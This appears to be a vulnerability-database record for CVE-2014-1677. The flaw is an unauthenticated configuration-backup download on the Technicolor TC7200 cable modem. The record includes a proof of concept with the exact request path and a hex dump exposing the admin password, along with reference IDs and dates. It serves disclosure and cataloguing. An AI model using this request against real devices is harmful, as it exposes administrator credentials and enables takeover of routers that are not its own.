ID
VAR-E-201402-0042
CVE
| cve_id: | CVE-2014-1677 | Trust: 3.0 |
EDB ID
31894
TITLE
Technicolor TC7200 - Credentials Disclosure - Hardware webapps Exploit
Trust: 0.6
DESCRIPTION
Technicolor TC7200 - Credentials Disclosure. CVE-2014-1677CVE-103712 . webapps exploit for Hardware platform
Trust: 0.6
AFFECTED PRODUCTS
| vendor: | technicolor | model: | tc7200 | scope: | - | version: | - | Trust: 2.7 |
EXPLOIT
# Exploit Title: Technicolor TC7200: Authentication Bypass
# Google Dork: N/A
# Date: 24-02-2014
# Exploit Author: Jeroen - IT Nerdbox
# Vendor Homepage: http://www.technicolor.com/
# Software Link: http://www.technicolor.com/en/solutions-services/connected-home/modems-gateways/cable-modems-gateways/tc7200-tc7300
# Version: STD6.01.12
# Tested on: N/A
# CVE : CVE-2014-1677
#
## Description:
#
# Any user on the internal network can download a backup configuration file without authenticating first. The backup file contains
# the credentials to the administrative web interface.
#
## PoC:
#
# Download the file: http://192.168.0.1/goform/system/GatewaySettings.bin
#
# Using the command: $ hexedit -C GatewaySettings.bin
#
# 00006590 00 00 00 00 00 00 00 00 30 4d 4c 6f 67 00 06 00 |........0MLog...|
# 000065a0 05 61 64 6d 69 6e 00 15 6d 79 73 75 70 65 72 73 |.admin..mysupers|
# 000065b0 65 63 72 65 74 70 61 73 73 77 6f 72 64 00 06 75 |ecretpassword..u|
# 000065c0 70 63 63 73 72 00 00 |pccsr..|
# 000065c7
#
#
# More information can be found at:http://www.nerdbox.it/technicolor-tc7200-auth-bypass-dos/
Trust: 1.0
EXPLOIT LANGUAGE
txt
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Credentials Disclosure
Trust: 1.6
TAGS
| tag: | exploit | Trust: 0.5 |
| tag: | bypass | Trust: 0.5 |
CREDITS
Jeroen - IT Nerdbox
Trust: 0.6
EXTERNAL IDS
| db: | NVD | id: | CVE-2014-1677 | Trust: 3.0 |
| db: | EXPLOIT-DB | id: | 31894 | Trust: 1.6 |
| db: | EDBNET | id: | 60398 | Trust: 0.6 |
| db: | 0DAYTODAY | id: | 21943 | Trust: 0.6 |
| db: | EDBNET | id: | 21688 | Trust: 0.6 |
| db: | PACKETSTORM | id: | 125388 | Trust: 0.5 |
| db: | BID | id: | 65774 | Trust: 0.3 |
REFERENCES
| url: | https://nvd.nist.gov/vuln/detail/cve-2014-1677 | Trust: 2.7 |
| url: | https://www.exploit-db.com/exploits/31894/ | Trust: 0.6 |
| url: | https://0day.today/exploits/21943 | Trust: 0.6 |
SOURCES
| db: | BID | id: | 65774 |
| db: | PACKETSTORM | id: | 125388 |
| db: | EXPLOIT-DB | id: | 31894 |
| db: | EDBNET | id: | 60398 |
| db: | EDBNET | id: | 21688 |
LAST UPDATE DATE
2022-07-27T10:03:12.366000+00:00
SOURCES UPDATE DATE
| db: | BID | id: | 65774 | date: | 2014-02-25T00:00:00 |
SOURCES RELEASE DATE
| db: | BID | id: | 65774 | date: | 2014-02-25T00:00:00 |
| db: | PACKETSTORM | id: | 125388 | date: | 2014-02-25T11:22:22 |
| db: | EXPLOIT-DB | id: | 31894 | date: | 2014-02-25T00:00:00 |
| db: | EDBNET | id: | 60398 | date: | 2014-02-25T00:00:00 |
| db: | EDBNET | id: | 21688 | date: | 2014-02-25T00:00:00 |